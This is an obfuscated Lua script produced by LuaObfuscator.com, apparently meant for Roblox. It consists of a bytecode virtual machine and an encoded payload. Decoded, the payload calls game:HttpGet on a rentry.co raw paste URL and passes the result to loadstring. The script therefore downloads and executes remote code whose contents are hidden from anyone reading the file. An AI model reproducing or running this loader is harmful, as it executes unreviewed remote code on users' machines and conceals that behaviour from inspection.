--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.3) ~  Much Love, Ferib 

]]--

local v0 = tonumber;
local v1 = string.byte;
local v2 = string.char;
local v3 = string.sub;
local v4 = string.gsub;
local v5 = string.rep;
local v6 = table.concat;
local v7 = table.insert;
local v8 = math.ldexp;
local v9 = getfenv or function()
	return _ENV;
end;
local v10 = setmetatable;
local v11 = pcall;
local v12 = select;
local v13 = unpack or table.unpack;
local v14 = tonumber;
local function v15(v16, v17, ...)
	local v18 = 0;
	local v19;
	local v20;
	local v21;
	local v22;
	local v23;
	local v24;
	local v25;
	local v26;
	local v27;
	local v28;
	local v29;
	local v30;
	while true do
		if (v18 == 5) then
			v27 = v24;
			v28 = nil;
			function v28(...)
				return {...}, v12("#", ...);
			end
			v18 = 6;
		end
		if (v18 == 2) then
			function v22()
				local v31 = v1(v16, v19, v19);
				v19 = v19 + 1;
				return v31;
			end
			v23 = nil;
			function v23()
				local v32, v33 = v1(v16, v19, v19 + 2);
				v19 = v19 + (5 - 3);
				return (v33 * (732 - 476)) + v32;
			end
			v18 = 3;
		end
		if (v18 == 4) then
			function v25()
				local v34 = v24();
				local v35 = v24();
				local v36 = 1 + 0;
				local v37 = (v21(v35, 1 + 0, 977 - (892 + 65)) * ((3 - 1) ^ (58 - 26))) + v34;
				local v38 = v21(v35, (31 + 22) - 32, 650 - (555 + 64));
				local v39 = ((v21(v35, 963 - (857 + 74)) == (569 - (367 + 201))) and -((1219 - 291) - (214 + 713))) or (1 + 0);
				if (v38 == (0 - 0)) then
					if (v37 == (0 + (1187 - (1069 + 118)))) then
						return v39 * (877 - (282 + 595));
					else
						v38 = 1;
						v36 = 1637 - ((3454 - 1931) + 114);
					end
				elseif (v38 == (1840 + 207)) then
					return ((v37 == (0 - 0)) and (v39 * ((1066 - (68 + 997)) / (1270 - ((494 - 268) + 1044))))) or (v39 * NaN);
				end
				return v8(v39, v38 - (745 + 278)) * (v36 + (v37 / ((8 - 6) ^ (169 - (32 + 85)))));
			end
			v26 = nil;
			function v26(v40)
				local v41;
				if not v40 then
					local v81 = 0;
					while true do
						if (v81 == ((0 - 0) + 0)) then
							v40 = v24();
							if (v40 == (0 - 0)) then
								return "";
							end
							break;
						end
					end
				end
				v41 = v3(v16, v19, (v19 + v40) - (1 + 0));
				v19 = v19 + v40;
				local v42 = {};
				for v64 = 792 - (368 + 423), #v41 do
					v42[v64] = v2(v1(v3(v41, v64, v64)));
				end
				return v6(v42);
			end
			v18 = 5;
		end
		if (v18 == 6) then
			v29 = nil;
			function v29()
				local v43 = 0;
				local v44;
				local v45;
				local v46;
				local v47;
				local v48;
				local v49;
				while true do
					local v66 = 1045 - (49 + 996);
					while true do
						if (v66 == 0) then
							local v90 = 0;
							while true do
								if (v90 == (1 + 0)) then
									v66 = 1475 - (1329 + 145);
									break;
								end
								if (v90 == 0) then
									if (v43 == (973 - (140 + 831))) then
										local v105 = 0;
										local v106;
										while true do
											if (v105 == (1850 - (1409 + 441))) then
												v106 = 0;
												while true do
													if (v106 ~= 1) then
													else
														for v160 = 719 - (15 + 703), v24() do
															local v161 = 0;
															local v162;
															local v163;
															local v164;
															while true do
																if (v161 == 1) then
																	v164 = nil;
																	while true do
																		if ((0 + 0) ~= v162) then
																		else
																			local v175 = 0;
																			while true do
																				if (v175 == 1) then
																					v162 = 1;
																					break;
																				end
																				if (v175 ~= (438 - (262 + 176))) then
																				else
																					v163 = 1721 - (345 + 1376);
																					v164 = nil;
																					v175 = 689 - (198 + 490);
																				end
																			end
																		end
																		if (v162 ~= (4 - 3)) then
																		else
																			while true do
																				if (v163 ~= 0) then
																				else
																					v164 = v22();
																					if (v21(v164, 1, 2 - 1) == (1206 - (696 + 510))) then
																						local v179 = 0;
																						local v180;
																						local v181;
																						local v182;
																						while true do
																							if (v179 == 3) then
																								if (v21(v181, 5 - 2, 1265 - (1091 + 171)) == (1 + 0)) then
																									v182[12 - 8] = v49[v182[4]];
																								end
																								v44[v160] = v182;
																								break;
																							end
																							if (v179 == (6 - 4)) then
																								local v185 = 374 - (123 + 251);
																								while true do
																									if (v185 == (4 - 3)) then
																										v179 = 701 - (208 + 490);
																										break;
																									end
																									if (v185 == 0) then
																										if (v21(v181, 1 + 0, 1) == (1 + 0)) then
																											v182[2] = v49[v182[2]];
																										end
																										if (v21(v181, 838 - (660 + 176), 2) == 1) then
																											v182[3] = v49[v182[3]];
																										end
																										v185 = 1 + 0;
																									end
																								end
																							end
																							if (v179 == (202 - (14 + 188))) then
																								local v186 = 675 - (534 + 141);
																								while true do
																									if (v186 == 1) then
																										v179 = 1 + 0;
																										break;
																									end
																									if (v186 ~= (0 + 0)) then
																									else
																										v180 = v21(v164, 2 + 0, 6 - 3);
																										v181 = v21(v164, 5 - 1, 16 - 10);
																										v186 = 1 + 0;
																									end
																								end
																							end
																							if (v179 ~= (1 + 0)) then
																							else
																								v182 = {v23(),v23(),nil,nil};
																								if (v180 == (0 - 0)) then
																									local v189 = 0 + 0;
																									local v190;
																									local v191;
																									while true do
																										if (v189 == 1) then
																											while true do
																												if ((0 - 0) ~= v190) then
																												else
																													v191 = 0 - 0;
																													while true do
																														if (v191 == (867 - (550 + 317))) then
																															v182[3 - 0] = v23();
																															v182[4] = v23();
																															break;
																														end
																													end
																													break;
																												end
																											end
																											break;
																										end
																										if (v189 == (0 - 0)) then
																											local v197 = 0 - 0;
																											while true do
																												if (0 ~= v197) then
																												else
																													v190 = 0;
																													v191 = nil;
																													v197 = 286 - (134 + 151);
																												end
																												if (v197 ~= (1666 - (970 + 695))) then
																												else
																													v189 = 1 - 0;
																													break;
																												end
																											end
																										end
																									end
																								elseif (v180 == (1991 - (582 + 1408))) then
																									v182[10 - 7] = v24();
																								elseif (v180 == (2 - 0)) then
																									v182[11 - 8] = v24() - ((1826 - (1195 + 629)) ^ (20 - 4));
																								elseif (v180 ~= (244 - (187 + 54))) then
																								else
																									local v199 = 780 - (162 + 618);
																									local v200;
																									while true do
																										if ((0 + 0) == v199) then
																											v200 = 0;
																											while true do
																												if (v200 ~= (0 + 0)) then
																												else
																													v182[6 - 3] = v24() - (2 ^ 16);
																													v182[4] = v23();
																													break;
																												end
																											end
																											break;
																										end
																									end
																								end
																								v179 = 2 - 0;
																							end
																						end
																					end
																					break;
																				end
																			end
																			break;
																		end
																	end
																	break;
																end
																if (v161 == 0) then
																	v162 = 0;
																	v163 = nil;
																	v161 = 1;
																end
															end
														end
														v43 = 1 + 2;
														break;
													end
													if (v106 == 0) then
														local v159 = 1636 - (1373 + 263);
														while true do
															if (v159 ~= (1001 - (451 + 549))) then
															else
																v106 = 1 + 0;
																break;
															end
															if (v159 ~= (0 - 0)) then
															else
																for v170 = 1, v48 do
																	local v171 = 0 - 0;
																	local v172;
																	local v173;
																	local v174;
																	while true do
																		if (v171 == 0) then
																			local v176 = 1384 - (746 + 638);
																			while true do
																				if (v176 == 1) then
																					v171 = 1;
																					break;
																				end
																				if (v176 == (0 + 0)) then
																					v172 = 0;
																					v173 = nil;
																					v176 = 1 - 0;
																				end
																			end
																		end
																		if (v171 == (342 - (218 + 123))) then
																			v174 = nil;
																			while true do
																				if (v172 == 1) then
																					if (v173 == 1) then
																						v174 = v22() ~= 0;
																					elseif (v173 == 2) then
																						v174 = v25();
																					elseif (v173 == 3) then
																						v174 = v26();
																					end
																					v49[v170] = v174;
																					break;
																				end
																				if (v172 ~= 0) then
																				else
																					local v178 = 0;
																					while true do
																						if (v178 == 0) then
																							local v183 = 1581 - (1535 + 46);
																							while true do
																								if (v183 ~= (0 + 0)) then
																								else
																									v173 = v22();
																									v174 = nil;
																									v183 = 1 + 0;
																								end
																								if (v183 == (561 - (306 + 254))) then
																									v178 = 1 + 0;
																									break;
																								end
																							end
																						end
																						if (v178 == 1) then
																							v172 = 1;
																							break;
																						end
																					end
																				end
																			end
																			break;
																		end
																	end
																end
																v47[5 - 2] = v22();
																v159 = 1468 - (899 + 568);
															end
														end
													end
												end
												break;
											end
										end
									end
									if (0 == v43) then
										v44 = {};
										v45 = {};
										v46 = {};
										v43 = 1 + 0;
									end
									v90 = 2 - 1;
								end
							end
						end
						if (v66 ~= (604 - (268 + 335))) then
						else
							if (v43 ~= 1) then
							else
								local v95 = 290 - (60 + 230);
								while true do
									if (v95 == 0) then
										v47 = {v44,v45,nil,v46};
										v48 = v24();
										v95 = 1;
									end
									if (v95 ~= 1) then
									else
										v49 = {};
										v43 = 1458 - (282 + 1174);
										break;
									end
								end
							end
							if (v43 ~= (814 - (569 + 242))) then
							else
								for v96 = 2 - 1, v24() do
									v45[v96 - (1 + 0)] = v29();
								end
								return v47;
							end
							break;
						end
					end
				end
			end
			v30 = nil;
			v18 = 7;
		end
		if (v18 == 0) then
			v19 = 1;
			v20 = nil;
			v16 = v4(v3(v16, 5), "..", function(v50)
				if (v1(v50, 2) == 79) then
					local v82 = 0;
					while true do
						if (v82 == 0) then
							v20 = v0(v3(v50, 1, 1));
							return "";
						end
					end
				else
					local v83 = 0;
					local v84;
					while true do
						if (v83 == 0) then
							v84 = v2(v0(v50, 16));
							if v20 then
								local v98 = 0;
								local v99;
								while true do
									if (v98 == 1) then
										return v99;
									end
									if (v98 == 0) then
										v99 = v5(v84, v20);
										v20 = nil;
										v98 = 1;
									end
								end
							else
								return v84;
							end
							break;
						end
					end
				end
			end);
			v18 = 1;
		end
		if (v18 == 3) then
			v24 = nil;
			function v24()
				local v51, v52, v53, v54 = v1(v16, v19, v19 + (1027 - (706 + 318)));
				v19 = v19 + (1255 - (721 + 530));
				return (v54 * (16778487 - (945 + 291 + 35))) + (v53 * (163729 - 98193)) + (v52 * 256) + v51;
			end
			v25 = nil;
			v18 = 4;
		end
		if (v18 == 7) then
			function v30(v55, v56, v57)
				local v58 = v55[1];
				local v59 = v55[2];
				local v60 = v55[3];
				return function(...)
					local v67 = v58;
					local v68 = v59;
					local v69 = v60;
					local v70 = v28;
					local v71 = 1;
					local v72 = -1;
					local v73 = {};
					local v74 = {...};
					local v75 = v12("#", ...) - 1;
					local v76 = {};
					local v77 = {};
					for v85 = 0, v75 do
						if (v85 >= v69) then
							v73[v85 - v69] = v74[v85 + 1];
						else
							v77[v85] = v74[v85 + 1];
						end
					end
					local v78 = (v75 - v69) + 1;
					local v79;
					local v80;
					while true do
						v79 = v67[v71];
						v80 = v79[1];
						if (v80 <= 5) then
							if (v80 <= 2) then
								if (v80 <= 0) then
									v77[v79[2]] = v57[v79[3]];
								elseif (v80 > 1) then
									local v107 = 0;
									local v108;
									local v109;
									local v110;
									local v111;
									local v112;
									while true do
										if (v107 == 8) then
											v79 = v67[v71];
											v77[v79[2]]();
											v71 = v71 + 1;
											v79 = v67[v71];
											v107 = 9;
										end
										if (v107 == 4) then
											v77[v79[2]] = v79[3];
											v71 = v71 + 1;
											v79 = v67[v71];
											v77[v79[2]] = v77[v79[3]];
											v107 = 5;
										end
										if (v107 == 3) then
											v77[v112 + 1] = v111;
											v77[v112] = v111[v79[4]];
											v71 = v71 + 1;
											v79 = v67[v71];
											v107 = 4;
										end
										if (v107 == 6) then
											v72 = (v110 + v112) - 1;
											v108 = 0;
											for v155 = v112, v72 do
												local v156 = 0;
												while true do
													if (v156 == 0) then
														v108 = v108 + 1;
														v77[v155] = v109[v108];
														break;
													end
												end
											end
											v71 = v71 + 1;
											v107 = 7;
										end
										if (v107 == 5) then
											v71 = v71 + 1;
											v79 = v67[v71];
											v112 = v79[2];
											v109, v110 = v70(v77[v112](v13(v77, v112 + 1, v79[3])));
											v107 = 6;
										end
										if (v107 == 0) then
											v108 = nil;
											v109, v110 = nil;
											v111 = nil;
											v112 = nil;
											v107 = 1;
										end
										if (v107 == 7) then
											v79 = v67[v71];
											v112 = v79[2];
											v77[v112] = v77[v112](v13(v77, v112 + 1, v72));
											v71 = v71 + 1;
											v107 = 8;
										end
										if (v107 == 9) then
											v71 = v79[3];
											break;
										end
										if (v107 == 2) then
											v71 = v71 + 1;
											v79 = v67[v71];
											v112 = v79[2];
											v111 = v77[v79[3]];
											v107 = 3;
										end
										if (1 == v107) then
											v77[v79[2]] = v57[v79[3]];
											v71 = v71 + 1;
											v79 = v67[v71];
											v77[v79[2]] = v57[v79[3]];
											v107 = 2;
										end
									end
								else
									local v113 = v79[2];
									local v114 = v77[v79[3]];
									v77[v113 + 1] = v114;
									v77[v113] = v114[v79[4]];
								end
							elseif (v80 <= 3) then
								v77[v79[2]] = v79[3];
							elseif (v80 == 4) then
								v77[v79[2]]();
							else
								local v118 = 0;
								local v119;
								local v120;
								local v121;
								local v122;
								while true do
									if (v118 == 0) then
										v119 = v79[2];
										v120, v121 = v70(v77[v119](v13(v77, v119 + 1, v79[3])));
										v118 = 1;
									end
									if (v118 == 1) then
										v72 = (v121 + v119) - 1;
										v122 = 0;
										v118 = 2;
									end
									if (v118 == 2) then
										for v157 = v119, v72 do
											local v158 = 0;
											while true do
												if (v158 == 0) then
													v122 = v122 + 1;
													v77[v157] = v120[v122];
													break;
												end
											end
										end
										break;
									end
								end
							end
						elseif (v80 <= 8) then
							if (v80 <= 6) then
								v71 = v79[3];
							elseif (v80 == 7) then
								v77[v79[2]] = v79[3] ~= 0;
							else
								local v124 = 0;
								local v125;
								while true do
									if (v124 == 0) then
										v125 = v79[2];
										v77[v125] = v77[v125](v13(v77, v125 + 1, v72));
										break;
									end
								end
							end
						elseif (v80 <= 10) then
							if (v80 == 9) then
								do
									return;
								end
							else
								for v128 = v79[2], v79[3] do
									v77[v128] = nil;
								end
							end
						elseif (v80 == 11) then
							v77[v79[2]] = v77[v79[3]];
						elseif (v77[v79[2]] == v79[4]) then
							v71 = v71 + 1;
						else
							v71 = v79[3];
						end
						v71 = v71 + 1;
					end
				end;
			end
			return v30(v29(), {}, v17)(...);
		end
		if (v18 == 1) then
			v21 = nil;
			function v21(v61, v62, v63)
				if v63 then
					local v88 = (v61 / (2 ^ (v62 - (701 - (271 + 429))))) % ((2 + 0) ^ (((v63 - (1501 - (1408 + 92))) - (v62 - ((275 + 812) - (461 + 625)))) + (1289 - ((1522 - (406 + 123)) + 295))));
					return v88 - (v88 % (1 + 0));
				else
					local v89 = (1173 - (418 + 753)) ^ (v62 - (1 + 0));
					return (((v61 % (v89 + v89)) >= v89) and (1 + 0)) or (0 + 0);
				end
			end
			v22 = nil;
			v18 = 2;
		end
	end
end
v15("LOL!053O00028O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574031E3O00682O7470733A2O2F72656E7472792E636F2F766377637778726B2F72617700103O0012033O00014O000A000100013O00260C3O0002000100010004063O000200012O0007000100013O001202000200023O00122O000300033O00202O00030003000400122O000500056O000600016O000300066O00023O00024O00020001000100044O000F00010004063O000200012O00093O00017O00", v9(), ...);
